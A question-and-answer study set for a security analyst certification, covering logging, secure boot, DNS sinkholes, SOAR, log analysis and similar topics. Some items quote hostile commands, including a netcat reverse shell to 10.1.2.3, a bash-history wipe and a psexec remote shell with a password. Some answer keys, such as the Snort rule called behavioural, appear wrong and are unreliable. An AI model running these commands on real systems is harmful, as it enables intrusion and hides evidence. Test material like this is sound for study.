DOMAIN 2 CSIT

Tracy is validating the web application security controls used by her organization. She wants to ensure that the organization is prepared to conduct forensic investigations of future security incidents. Which one of the following OWASP control categories is most likely to contribute to this effort? A. Implement logging B. Validate all inputs C. Parameterize queries D. Error and exception handling

A. Implement logging

What advantage does a virtual desktop infrastructure have when addressing data theft? A. No data is stored locally on the endpoint device B. Built-in DLP C. All data is encrypted at rest D. All data is stored locally on the endpoint device

A. No data is stored locally on the endpoint device

Barney's organization mandates fuzz testing for all applications before deploying them into production. Which one of the following issues is this testing methodology most likely to detect? A. Incorrect firewall rules B. Unvalidated input C. Missing operating system patches D. Unencrypted data transmission

B. Unvalidated input

Tom connects to a website using the Chrome web browser. The site uses TLS encryption and presents the digital certificate shown here. Which one of the following websites would not be covered by this certificate? A. nd.edu B. www.nd.edu C. www.business.nd.edu D. All of these sites would be covered by the certificate.

C. www.business.nd.edu

Gabby executes the following command. What is she doing? ps -aux | grep apache2 | grep root A. Searching for all files owned by root named apache2 B. Checking currently running processes with the word apache2 and root both appearing in the output of top C. Shutting down all apache2 processes run by root D. There is not enough information to answer this question.

B. Checking currently running processes with the word apache2 and root both appearing in the output of top

Azra's network firewall denies all inbound traffic but allows all outbound traffic. While investigating a Windows workstation, she encounters a script that runs the following command. at \\workstation10 20:30 every:F nc -nv 10.1.2.3 443 -e cmd.exe What does it do? A. It opens a reverse shell for host 10.1.2.3 using netcat every Friday at 8:30. B. It uses the AT command to dial a remote host via NetBIOS. C. It creates an HTTPS session to 10.1.2.3 every Friday at 8:30. D. It creates a VPN connection to 10.1.2.3 every five days at 8:30 GST.

A. It opens a reverse shell for host 10.1.2.3 using netcat every Friday at 8:30.

During a periodic audit of account privileges, Rhonda reviews the account rights in an Active Directory domain for every administrative user and removes any rights to directories or systems that should no longer be available to the administrative users. What type of review is this? A. Manual review B. IAM assessment C. Mandatory audit review D. Discretional audit review

A. Manual review

Kaitlyn's organization recently set a new password policy that requires that all passwords have a minimum length of 10 characters and meet certain complexity requirements. She would like to enforce this requirement for the Windows systems in her domain. What type of control would most easily allow this? A. Group Policy Object B. Organizational unit C. Active Directory forest D. Domain controller

A. Group Policy Object

Isaac is reviewing an organization's network security controls and discovers that port security has been enabled to control which systems can connect to network ports. Which of the following technologies should he recommend instead to help avoid the weaknesses that port security has in its security model? A. 802.1x B. DMARC C. SPF D. 802.3

A. 802.1x

Rowan wants to block drive-by-downloads and bot command and control channels while redirecting potentially impacted systems to a warning message. What should she implement to do this? A. A DNS sinkhole B. A WAF C. An IDS D. A UEBA

A. A DNS sinkhole

Although both Secure Boot and Measured Boot processes rely on a chain of trust, only one validates the objects in the chain. Which technology does this and what process does it follow? A. A Secured Boot chain validates the boot objects using private keys to check against public keys already in the BIOS. B. A Measured Boot chain computes the hash of the next object in the chain and compares it to the hash of the previous object. C. A Secured Boot chain computes the hash of the next object in the chain and compares it to the hash of the previous object. D. A Measured Boot chain validates the boot objects using private keys to check against public keys already in the BIOS.

A. A Secured Boot chain validates the boot objects using private keys to check against public keys already in the BIOS.

Alaina has configured her SOAR system to detect irregularities in geographical information for logins to her organization's administrative systems. The system alarms, noting that an administrator has logged in from a location that they do not typically log in from. What other information would be most useful to correlate with this to determine if the login is a threat? A. Anomalies in privileged account usage B. Time-based login information C. A mobile device profile change D. DNS request anomalies

A. Anomalies in privileged account usage

While reviewing indicators of compromise, Dustin notices that notepad.exe has opened a listener port on the Windows machine he is investigating. What is this an example of? A. Anomalous behavior B. Heuristic behavior C. Entity behavior D. Known-good behavior

A. Anomalous behavior

Security screws are an example of what type of control? A. Anti-tamper B. Detective C. Anti-theft D. Corrective

A. Anti-tamper

What practice is typical in a DevSecOps organization as part of a CI/CD pipeline? A. Automating some security gates B. Programmatic implementation of zero-day vulnerabilities C. Using security practitioners to control the flow of the CI/CD pipeline D. Removing security features from the IDE

A. Automating some security gates

What type of dedicated device is used in organizations that can generate keys, create and validate digital signatures, and provide cryptoprocessing to both encrypt and decrypt data? A. HSMs B. BGPs C. SSMs D. None of the above

A. HSMs

Ian wants to leverage multiple threat flows, and he knows that using a standardized threat information format would help. What threat information standards should he look for from his feed providers to maximize compatibility between his information sources? A. STIX and TAXII B. SAML and OCSP C. STIX and CAB D. SAML and TAXII

A. STIX and TAXII

Corbin wants to prevent attackers from bypassing port security on his network's edge devices. What technique are attackers most likely to use to try to bypass it? A. Spoofing MAC addresses B. Providing valid credentials C. Spoofing IP addresses D. Providing fake credentials

A. Spoofing MAC addresses

Elliott wants to encrypt data sent between his servers. What protocol is most commonly used for secure web communications over a network? A. TLS B. SSL C. IPSec D. PPTP

A. TLS

Derek's organization has been working to recover from a recent malware infection that caused outages across the organization during an important part of their business cycle. In order to properly triage, what should Derek pay the most attention to first? A. The immediate impact on operations so that his team can restore functionality B. The total impact of the event so that his team can provide an accurate final report C. The immediate impact on operations so that his team can identify the likely threat actor D. The total impact of the event so that his team can build a new threat model for future use

A. The immediate impact on operations so that his team can restore functionality

Michelle wants to implement a static analysis security testing (SAST) tool into her continuous integration pipeline. What challenge could she run into if her organization uses multiple programming languages for components of their application stack that will be tested? A. They will have to ensure the scanner works with all of the languages chosen. B. They will have to compile all of the code to the same binary output language. C. They will have to run the applications in a sandbox. D. They will have to run the applications under the same execution environment.

A. They will have to ensure the scanner works with all of the languages chosen.

Sofía wants to ensure that the ICs in the new device that her commercial consumer products company is releasing cannot be easily reverse engineered. Which technique is not an appropriate means of meeting her requirement? A. Use a trusted foundry. B. Encase the IC in epoxy. C. Design the chip to zeroize sensitive data if its security encapsulation fails. D. Design the chip to handle out of spec voltages and clock signals.

A. Use a trusted foundry.

Henry configures his next-generation firewall (NGFW) security device to forge DNS responses for known malicious domains. This results in users who attempt to visit sites hosted by those domains to see a landing page that Henry controls, which advises them they were prevented from visiting a malicious site. What is this technique known as? A. DNS masquerading B. DNS sinkholing C. DNS re-sequencing D. DNS hierarchy revision

B. DNS sinkholing

While tracking a potential APT on her network, Cynthia discovers a network flow for her company's central file server. What does this flow entry most likely show if 10.2.2.3 is not a system on her network? Date flow start Duration Proto Src IP Addr:Port Dst IP Addr:Port Packets Bytes Flows 2019-07-11 13:06:46.343 21601804 TCP 10.1.1.1:1151-˃10.2.2.3:443 9473640 9.1 G 1 2019-07-11 13:06:46.551 21601804 TCP 10.2.2.3:443-˃10.1.1.1:1151 8345101 514 M 1 A. A web browsing session B. Data exfiltration C. Data infiltration D. A vulnerability scan

B. Data exfiltration

While analyzing a malware package, Ryan finds a list of hostnames shown here: earnestnessrealsitetest.com rvcxestnessrealsitetest.com hjbtestnessrealsitetest.com agekestnessrealsitetest.com sgjxestnessrealsitetest.com igjyestnessrealsitetest.com zxahestnessrealsitetest.com zfrpestnessrealsitetest.com hdquestnessrealsitetest.com umcuestnessrealsitetest.com hrbyestnessrealsitetest.com ysrtestnessrealsitetest.com kgteestnessrealsitetest.com hfsnestnessrealsitetest.com njxfestnessrealsitetest.com What has he likely found in the malware package? A. A RPG B. A DGA C. A SPT D. A FIN

B. A DGA

While reviewing the Wireshark packet capture shown here, Ryan notes an extended session using the ESP protocol. When he clicks on the packets, he is unable to make sense of the content. What should Ryan look for on the workstation with IP address 10.0.0.1 if he investigates it in person? A. An encrypted RAT B. A VPN application C. A secure web browser D. A base64 encoded packet transfer utility

B. A VPN application

What is the key difference between a secured boot chain and a measured boot chain? A. A secured boot chain depends on a root of trust. B. A measured boot chain computes the hash of the next object in the chain and stores it securely. C. A secured boot chain computes the hash of the next object in the chain and stores it securely. D. A measured boot chain depends on a root of trust.

B. A measured boot chain computes the hash of the next object in the chain and stores it securely.

Tracy has reviewed the CrowdStrike writeup for an APT group known as HELIX KITTEN, which notes that the group is known for creating "thoroughly researched and structured spear-phishing messages relevant to the interests of targeted personnel." What types of defenses are most likely to help if she identifies HELIX KITTEN as a threat actor of concern for her organization? A. DKIM B. An awareness campaign C. Blocking all email from unknown senders D. SPF

B. An awareness campaign

Barcodes and RFID tags are both frequently used for what asset management practice? A. Asset disposition B. Asset tagging C. Asset acquisition D. Asset lifespan estimation

B. Asset tagging

Micah is designing a containerized application security environment and wants to ensure that the container images he is deploying do not introduce security issues due to vulnerable applications. What can he integrate into the CI/CD pipeline to help prevent this? A. Automated checking of application hashes against known good versions B. Automated vulnerability scanning C. Automated fuzz testing D. Automated updates

B. Automated vulnerability scanning

Betty wants to review the security logs on her Windows workstation. What tool should she use to do this? A. Secpol.msc B. Event Viewer C. Log Viewer D. Logview.msc

B. Event Viewer

Nathan downloads a BIOS update from Dell's website, and when he attempts to install it on the PC, he receives an error that the hash of the BIOS does not match the hash stored on Dell's servers. What type of protection is this? A. Full-disk encryption B. Firmware protection C. Operating system protection D. None of the above

B. Firmware protection

Maria wants to deploy an antimalware tool to detect zero-day malware. What type of detection method should she look for in her selected tool? A. Signature-based B. Heuristic-based C. Trend-based D. Availability-based

B. Heuristic-based

What type of information can Gabby determine from Tripwire logs on a Linux system if it is configured to monitor a directory? A. How often the directory is accessed B. If files in the directory have changed C. If sensitive data was copied out of the directory D. Who has viewed files in the directory

B. If files in the directory have changed

Adam is testing code written for a client-server application that handles financial information and notes that traffic is sent between the client and server via TCP port 80. What should he check next? A. If the server stores data in unencrypted form B. If the traffic is unencrypted C. If the systems are on the same network D. If usernames and passwords are sent as part of the traffic

B. If the traffic is unencrypted

Ian has been asked to deploy a secure wireless network in parallel with a public wireless network inside his organization's buildings. What type of segmentation should he implement to do so without adding additional costs and complexity? A. SSID segmentation B. Logical segmentation C. Physical segmentation D. WPA segmentation

B. Logical segmentation

Robert is reviewing a web application and the developers have offered four different responses to incorrect logins. Which of the following four responses is the most secure option? A. Login failed for user; invalid password B. Login failed; invalid user ID or password C. Login failed; invalid user ID D. Login failed; account does not exist

B. Login failed; invalid user ID or password

What technology tracks endpoint user and entity behaviors, centralizes that data as well as other security data, and then uses statistical models to detect unusual behavior and notify administrators? A. An IPS B. UEBA C. An IDS D. DMARC

B. UEBA

Amanda has been assigned to reduce the attack surface area for her organization, and she knows that the current network design relies on allowing systems throughout her organization to access the Internet directly via public IPs they are assigned. What should her first step be to reduce her organization's attack surface quickly and without large amounts of time invested? A. Install host firewalls on the systems B. Move to a NAT environment C. Install an IPS D. None of the above

B. Move to a NAT environment

The OWASP mobile application security checklist's cryptography requirements include a requirement that the application uses "proven implementations of cryptographic primitives." What does this requirement mean, and why is it in the checklist? A. Only use basic cryptographic techniques to ensure that developers can understand them B. Only use proven versions of cryptographic algorithms so that they will be secure C. Only use in-house developed and tested cryptographic algorithms to avoid known vulnerabilities D. Only use open source cryptographic techniques to ensure that their source code can be reviewed

B. Only use proven versions of cryptographic algorithms so that they will be secure

Nathan is reviewing PHP code for his organization and finds the following code in the application he is assessing. What technique is the developer using? $stmt = $dbh-˃prepare("INSERT INTO REGISTRY (var1, var2) VALUES (:var1, :var2)"); $stmt-˃bindParam(':var1', $var1); $stmt-˃bindParam(':var2', $var2); A. Dynamic binding B. Parameterized queries C. Variable limitation D. None of the above

B. Parameterized queries

Local and domain administrator accounts, root accounts, and service accounts are all examples of what type of account? A. Monitored accounts B. Privileged accounts C. Root accounts D. Unprivileged accounts

B. Privileged accounts

Amira wants to deploy an open standard-based single sign-on (SSO) tool that supports both authentication and authorization. What open standard should she look for if she wants to federate with a broad variety of identity providers and service providers? A. LDAP B. SAML C. OAuth D. OpenID Connect

B. SAML

Faraj wants to use statistics gained from live analysis of his network to programmatically change its performance, routing, and optimization. Which of the following technologies is best suited to his needs? A. Serverless B. Software-defined networking C. Physical networking D. Virtual private networks (VPNs)

B. Software-defined networking

What technology is most commonly used to protect data in transit for modern web applications? A. VPN B. TLS C. SSL D. IPSec

B. TLS

How are eFuses used to prevent firmware downgrades? A. If they are burned, the firmware cannot be changed. B. The number of fuses burned indicates the current firmware level, preventing old versions from being installed. C. eFuses must be reset before firmware can be downgraded, requiring administrative access. D. eFuses cannot be used to prevent firmware downgrades.

B. The number of fuses burned indicates the current firmware level, preventing old versions from being installed.

Refer to the following scenario to answer the question: Chris is troubleshooting the firewall rulebase that appears here: The firewall rule creators intended to block access to a website hosted at 10.15.1.2 except from hosts located on the 10.20.0.0/16 subnet. However, users on that subnet report that they cannot access the site. What is wrong? A. The protocol is incorrect. B. The rules are misordered. C. The source port is not specified. D. There is no error in the rule, and Chris should check for other issues.

B. The rules are misordered.

Refer to the following scenario and image to answer the question. Bill is reviewing the authentication logs for a Linux system that he operates and encounters the following log entries: Aug 30 09:46:54 ip-172-30-0-62 sshd[3051]: Accepted publickey for ec2-user from 10.174.238.88 port 57478 ssh2 : RSA e5:f5:c1:46:bb:49:a1:43:da:9d:50:c5:37:bd:79:22 Aug 30 09:46:54 ip-172-30-0-62 ssh[3051]: pam_unix[sshd:session]: session opened for user ec2-user by (uid=0) Aug 30 09:48:06 ip-172-30-0-62 sudo: ec2-user : TTY=ps/0 ; PWD=/home/ec2-user ; USER=root; COMMAND=/bin/bash What account did the individual use to connect to the server? A. root B. ec2-user C. bash D. pam_unix

B. ec2-user

Singh wants to prevent remote login attacks against the root account on a Linux system. What method will stop attacks like this while allowing normal users to use SSH? A. Add an iptables rule blocking root logins B. Add root to the sudoers group C. Change sshd_config to deny root login D. Add a network IPS rule to block root logins

C. Change sshd_config to deny root login

A web server and a web browser are examples of what type of platform? A. Embedded B. Firmware C. Client-server D. SOC

C. Client-server

While reviewing tcpdump data, Kwame discovers that hundreds of different IP addresses are sending a steady stream of SYN packets to a server on his network. What should Kwame be concerned is happening? A. A firewall is blocking connections from occurring B. An IPS is blocking connections from occurring C. A SYN flood D. An ACK blockage

C. A SYN flood

Bruce wants to integrate a security system to his SOAR. The security system provides real-time query capabilities, and Bruce wants to take advantage of this to provide up-to-the-moment data for his SOAR tool. What type of integration is best suited to this? A. CSV B. Flat file C. API D. Email

C. API

Use the following scenario for the question. Scott has been asked to select a software development model for his organization, and knows that there are a number of models that may make sense for what he has been asked to accomplish. Use your knowledge of SDLC models to identify an appropriate model for each of the following requirements. Scott's organization needs basic functionality of the effort to become available as soon as possible and wants to involve the teams that will use it heavily to ensure that their needs are met. What model should Scott recommend? A. Waterfall B. Spiral C. Agile D. Rapid Application Development

C. Agile

Bobbi is deploying a single system that will be used to manage a very sensitive industrial control process. This system will operate in a standalone fashion and not have any connection to other networks. What strategy is Bobbi deploying to protect this SCADA system? A. Network segmentation B. VLAN isolation C. Airgapping D. Logical isolation

C. Airgapping

A tarpit, or a system that looks vulnerable but actually is intended to slow down attackers, is an example of what type of technique? A. A passive defense B. A sticky defense C. An active defense D. A reaction-based defense

C. An active defense

While reviewing web server logs, Danielle notices the following entry. What occurred? 10.11.210.6 - GET /wordpress/wp-admin/theme-editor.php?file=404.php&theme= total 200 A. A theme was changed B. A file was not found C. An attempt to edit the 404 page D. The 404 page was displayed

C. An attempt to edit the 404 page

Micro-probing, applying unexpected or out of specification voltages or clock signals, and freezing a device are all examples of types of attacks prevented by what type of technique? A. DRM B. Anti-theft C. Anti-tamper D. Fault tolerance

C. Anti-tamper

What type of operation occurs in a way that prevents another processor or I/O device from reading or writing to a memory location that is in use by the operation until the operation is complete? A. A complete operation B. A fractional operation C. Atomic execution D. Perpendicular execution

C. Atomic execution

Which of the following parties directly communicate with the end user during a SAML transaction? A. The relying party B. The SAML identity provider C. Both the relying party and the identity provider D. Neither the relying party nor the identity provider

C. Both the relying party and the identity provider

Brian is on the development team that his company has tasked with maintaining their organization's web application. He and his coworkers check code in multiple times a day, and the code is then verified and tested automatically. What is this practice called? A. Continuous delivery B. Repo-stuffing C. Continuous integration D. Time coding

C. Continuous integration

Pranab is implementing cryptographic controls to protect his organization and would like to use defense-in-depth controls to protect sensitive information stored and transmitted by a web server. Which one of the following controls would be least suitable to directly provide this protection? A. TLS B. VPN C. DLP D. FDE

C. DLP

When a DLP system is monitoring copy/paste, data displayed on a screen or captured from the screen, printing, and similar activities, what term describes the data's state? A. Data at rest B. Data in motion C. Data in use D. Data execution

C. Data in use

Alaina adds the openphish URL list to her SOAR tool and sees the following entries: http://13.126.65.8/DocExaDemo/uploads/index.php/bofa/bofa/95843de35406f3cab0b2dcf2b/success.htm http://13.126.65.8/DocExaDemo/uploads/index.php/bofa/bofa/9b094075409d3a723c7ee3d9e/sitekey.php http://13.126.65.8/DocExaDemo/uploads/index.php/bofa/bofa/9b094075409d3a723c7ee3d9e/success.htm http://13.126.65.8/DocExaDemo/uploads/index.php/bofa/bofa/9b094075409d3a723c7ee3d9e/ http://13.126.65.8/DocExaDemo/uploads/index.php/bofa/bofa/95843de35406f3cab0b2dcf2b/ http://13.126.65.8/DocExaDemo/uploads/index.php/bofa/bofa/95843de35406f3cab0b2dcf2b/sitekey.php What action should she take based on phishing URLs like these? A. Block the IP address at her border firewall B. Monitor for the IP address using her IDS C. Delete emails with the URL from inbound email D. Nothing, as these have not been confirmed

C. Delete emails with the URL from inbound email

What key functionality do enterprise privileged account management tools provide? A. Password creation B. Access control to individual systems C. Entitlement management across multiple systems D. Account expiration tools

C. Entitlement management across multiple systems

While reviewing the auth.log file on a Linux system she is responsible for, Tiffany discovers the following log entries: Aug 6 14:13:06 demo sshd[5273]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=127.0.0.1 user=root Aug 6 14:13:06 demo sshd[5273]: PAM service(sshd) ignoring max retries; 6 ˃ 3 Aug 6 14:13:07 demo sshd[5280]: Failed password for root from 127.0.0.1 port 38463 ssh2 Aug 6 14:13:07 demo sshd[5280]: error: maximum authentication attempts exceeded for root from 127.0.0.1 port 38463 ssh2 [preauth] Aug 6 14:13:07 demo sshd[5280]: Disconnecting: Too many authentication failures [preauth] Which of the following has not occurred? A. A user has attempted to reauthenticate too many times. B. PAM is configured for three retries and will reject any additional retries in the same session. C. Fail2ban has blocked the SSH login attempts. D. Root is attempting to log in via SSH from the local host.

C. Fail2ban has blocked the SSH login attempts

Use the following diagram and scenario for the question. Amanda has been assigned to lead the development of a new web application for her organization. She is following a standard SDLC model as shown here. Use the model and your knowledge of the software development life cycle to answer the following questions. Amanda's first task is to determine if there are alternative solutions that are more cost effective than in-house development. What phase is she in? A. Design B. Operations and maintenance C. Feasibility D. Analysis and requirements definition

C. Feasibility

While reviewing email headers, Saanvi notices an entry that reads: From: "John Smith, CIO" <[email protected]> with a Received: parameter that shows mail.demo.com [10.74.19.11]. Which of the following scenarios is most likely if demo.com is not a domain belonging to the same owner as example.com? A. John Smith's email was forwarded by someone at demo.com. B. John Smith's email was sent to someone at demo.com. C. The headers were forged to make it appear to have come from John Smith. D. The mail.demo.com server is a trusted email forwarding partner for example.com.

C. The headers were forged to make it appear to have come from John Smith.

While reviewing the command history for an administrative user, Lakshman discovers a suspicious command that was captured: ln /dev/null ~/.bash_history What action was this user attempting to perform? A. Enabling the Bash history B. Appending the contents of /dev/null to the Bash history C. Logging all shell commands to /dev/null D. Allowing remote access from the null shell

C. Logging all shell commands to /dev/null

Isaac's organization has deployed a security tool that learns how network users typically behave and then searches for differences that match attack behaviors. What type of system can automatically analyze this data to build detection capability like this? A. Signature-based analysis B. A Babbage machine C. Machine learning D. Artificial network analysis

C. Machine learning

Alex needs to deploy a solution that will limit access to his network to only authorized individuals while also ensuring that the systems that connect to the network meet his organization's patching, antivirus, and configuration requirements. Which of the following technologies will best meet these requirements? A. Whitelisting B. Port Security C. NAC D. EAP

C. NAC

The Open Web Application Security Project (OWASP) maintains a listing of the most important web application security controls. Which one of these items is least likely to appear on that list? A. Implement identity and authentication controls B. Implement appropriate access controls C. Obscure web interface locations D. Leverage security frameworks and libraries

C. Obscure web interface locations

Lucca wants to prevent brute-force attacks from succeeding against a web application. Which of the following is not a commonly implemented solution to help reduce the effectiveness of brute-force attacks? A. Multifactor authentication B. Account lockouts C. Password reuse D. CAPTCHAs

C. Password reuse

After conducting an nmap scan of his network from outside of his network, James notes that a large number of devices are showing three TCP ports open on public IP addresses: 9100, 515, and 631. What type of devices has he found, and how could he reduce his organization's attack surface? A. Wireless access points, disable remote administration B. Desktop workstations, enable the host firewall C. Printers, move the printers to an internal only IP range D. Network switches, enable encrypted administration mode

C. Printers, move the printers to an internal only IP range

Support for AES, 3DES, ECC, and SHA-256 are all examples of what? A. Encryption algorithms B. Hashing algorithms C. Processor security extensions D. Bus encryption modules

C. Processor security extensions

What type of attack is the use of query parameterization intended to prevent? A. Buffer overflows B. Cross-site scripting C. SQL injection D. Denial-of-service attacks

C. SQL injection

Ben adds a unique, randomly generated string to each password before it is hashed as part of his web application's password storage process. What is this process called? A. Mashing B. Hashing C. Salting D. Peppering

C. Salting

Liam wants to protect data at rest in an SaaS service. He knows that he needs to consider his requirements differently in his cloud environment than an on-premises environment. What option can he use to ensure that the data is encrypted when it is stored? A. Install a full-disk encryption tool. B. Install a column-level encryption. C. Select an SaaS service that supports encryption at rest. D. Hire an independent auditor to validate the encryption.

C. Select an SaaS service that supports encryption at rest.

Manesh downloads a new security tool and checks its MD5. What does she know about the software she downloaded if she receives the following message: root@demo:~# md5sum -c demo.md5 demo.txt: FAILED md5sum: WARNING: 1 computed checksum did NOT match A. The file has been corrupted. B. Attackers have modified the file. C. The files do not match. D. The test failed and provided no answer.

C. The files do not match.

While reviewing systems she is responsible for, Charlene discovers that a user has recently run the following command in Windows console window. What has occurred? psexec \\10.0.11.1 -u Administrator -p examplepw cmd.exe A. The user has opened a command prompt on their workstation. B. The user has opened a command prompt on the desktop of a remote workstation. C. The user has opened an interactive command prompt as administrator on a remote workstation. D. The user has opened a command prompt on their workstation as Administrator.

C. The user has opened an interactive command prompt as administrator on a remote workstation.

Dev wants to use Secure Boot on a workstation. What technology must his workstation use to support Secure Boot? A. BIOS B. ROM C. UEFI D. TPM

C. UEFI

Which one of the following testing techniques is typically the final testing done before code is released to production? A. Unit testing B. Integration testing C. User acceptance testing D. Security testing

C. User acceptance testing

A system that Carlos is responsible for has been experiencing consistent denial of service attacks using a version of the Low Orbit Ion Cannon (LOIC), which leverages personal computers in a concerted attack by sending large amounts of traffic from each system to flood a server, thus making it unable to respond to legitimate requests. What type of firewall rule should Carlos use to limit the impact of a tool like this if bandwidth consumption from the attack itself is not the root problem? A. IP-based blacklisting B. Dropping all SYN packets C. Using a connection rate or volume-limiting filter per IP D. Using a route-blocking filter that analyzes common LOIC routes

C. Using a connection rate or volume-limiting filter per IP

While investigating a compromise, Glenn encounters evidence that a user account has been added to the system he is reviewing. He runs a diff of /etc/shadow and /etc/passwd and sees the following output. What has occurred? root:$6$XHxtN5iB$5WOyg3gGfzr9QHPLo.7z0XIQIzEW6Q3/K7iipxG7ue04CmelkjC51SndpOcQlxTHmW4/AKKsKew4f3cb/ .BK8/:16828:0:99999:7::: ˃ daemon:*:16820:0:99999:7::: ˃ bin:*:16820:0:99999:7::: ˃ sys:*:16820:0:99999:7::: ˃ sync:*:16820:0:99999:7::: ˃ games:*:16820:0:99999:7::: ˃ man:*:16820:0:99999:7::: ˃ lp:*:16820:0:99999:7::: ˃ mail:*:16820:0:99999:7::: ˃ news:*:16820:0:99999:7::: ˃ uucp:*:16820:0:99999:7::: ˃ proxy:*:16820:0:99999:7::: ˃ www-data:*:16820:0:99999:7::: ˃ backup:*:16820:0:99999:7::: ˃ list:*:16820:0:99999:7::: ˃ irc:*:16820:0:99999:7::: A. The root account has been compromised. B. An account named daemon has been added. C. The shadow password file has been modified. D. /etc/shadow and /etc/passwd cannot be diffed to create a useful comparison.

D. /etc/shadow and /etc/passwd cannot be diffed to create a useful comparison.

Which hardware device is used on endpoint devices to store RSA encryption keys specific to that device to allow hardware authentication? A. A SSD B. A hard drive C. A MFA token D. A TPM

D. A TPM

Micah wants to use the data he has collected to help with his threat hunting practice. What type of approach is best suited to using large volumes of log and analytical data? A. Hypothesis-driven investigation B. Investigation based on indicators of compromise C. Investigation based on indications of attack D. AI/ML-based investigation

D. AI/ML-based investigation

At what point in a continuous integration (CI)/continuous delivery (CD) pipeline should security testing be performed? A. After code is checked into the repository B. After code is deployed into an automated test environment C. After the code is deployed into production D. All of the above

D. All of the above

Ling wants to use her SOAR platform to handle phishing attacks more effectively. What elements of potential phishing emails should she collect as part of her automation and workflow process to triage and assign severity indicators? A. Subject lines B. Email sender addresses C. Attachments D. All of the above

D. All of the above

The Snort IPS that Adam has configured includes a rule that reads alert tcp $EXTERNAL_NET any -˃ 10.0.10.0/24 80 (msg:"Alert!"; content:"http|3a|//www.example.com/download.php"; nocase; offset:12; classtype: web-application-activity;sid:5555555; rev:1;) What type of detection method is Adam using? A. Anomaly-based B. Trend-based C. Availability-based D. Behavioral-based

D. Behavioral-based

Eleanor is using the US-CERT NCISS observed activity levels to assess threat actor activity. If she has systems with active ransomware infections that have encrypted data on the systems but the systems have available and secure backups, at what level should she rate the observed activity? A. Prepare B. Engage C. Presence D. Effect

D. Effect

Padma is evaluating the security of an application developed within her organization. She would like to assess the application's security by supplying it with invalid inputs. What technique is Padma planning to use? A. Fault injection B. Stress testing C. Mutation testing D. Fuzz testing

D. Fuzz testing

Which of the items from the following list is not typically found in an email header? A. Sender IP address B. Date C. Receiver IP address D. Private key

D. Private key

Alex configured a Snort rule that reads: alert tcp any any -˃ any 22 (mst: "Detected!"; sid 10000004;) What will Alex's rule typically detect? A. FTP traffic B. Telnet traffic C. SMTP traffic D. SSH traffic

D. SSH traffic

Which of the following is not a typical capability of processor security extensions? A. Data and instruction path integrity checks B. Error detection for memory and registers C. Stack bounds checking D. Secure register wiping capabilities

D. Secure register wiping capabilities

The OWASP Session Management Cheatsheet advises that session IDs are meaningless and recommends that they should be used only as an identifier on the client side. Why should a session ID not have additional information encoded in it like the IP address of the client, their username, or other information? A. Processing complex session IDs will slow down the service. B. Session IDs cannot contain this information for legal reasons. C. Session IDs are sent to multiple different users, which would result in a data breach. D. Session IDs could be decoded, resulting in data leakage.

D. Session IDs could be decoded, resulting in data leakage.

Which of the following is not a limitation of a DNS sinkhole? A. They do not work on traffic sent directly to an IP address. B. They do not prevent malware from being executed. C. They can be bypassed using a hard-coded DNS server. D. They cannot block drive-by-download attempts.

D. They cannot block drive-by-download attempts.

Charles wants to provide additional security for his web application, which currently stores passwords in plaintext in a database. Which of the following options will best prevent theft of the database from resulting in exposed passwords? A. Encrypt the database of plaintext passwords B. Use MD5 and a salt C. Use SHA-1 and a salt D. Use bcrypt

D. Use bcrypt

Lara has been assigned to assess likely issues with an embedded system used for building automation and control. Which of the following software assurance issues is least likely to be of concern for her organization? A. Lack of updates and difficulty deploying them B. Long life cycle for the embedded devices C. Assumptions of network security where deployed D. Use of proprietary protocols

D. Use of proprietary protocols

Mike is in charge of the software testing process for his company. They perform a complete set of tests for each product throughout its lifespan. Use your knowledge of software assessment methods to answer the following question. A new web application has been written by the development team in Mike's company. They used an Agile process and have built a tool that fits all of the user stories that the participants from the division that asked for the application outlined. If they want to ensure that the functionality is appropriate for all users in the division, what type of testing should Mike perform? A. Stress testing B. Regression testing C. Static testing D. User acceptance testing

D. User acceptance testing

Which one of the following components is not normally part of an endpoint security suite? A. IPS B. Firewall C. Antimalware D. VPN

D. VPN

Charles wants to determine if a message he received was forwarded by analyzing the headers of the message. How can he determine this? A. Reviewing the Message-ID to see if it has been incremented B. Checking for the In-Reply-To field C. Checking for the References field D. You cannot determine if a message was forwarded by analyzing the headers.

D. You cannot determine if a message was forwarded by analyzing the headers.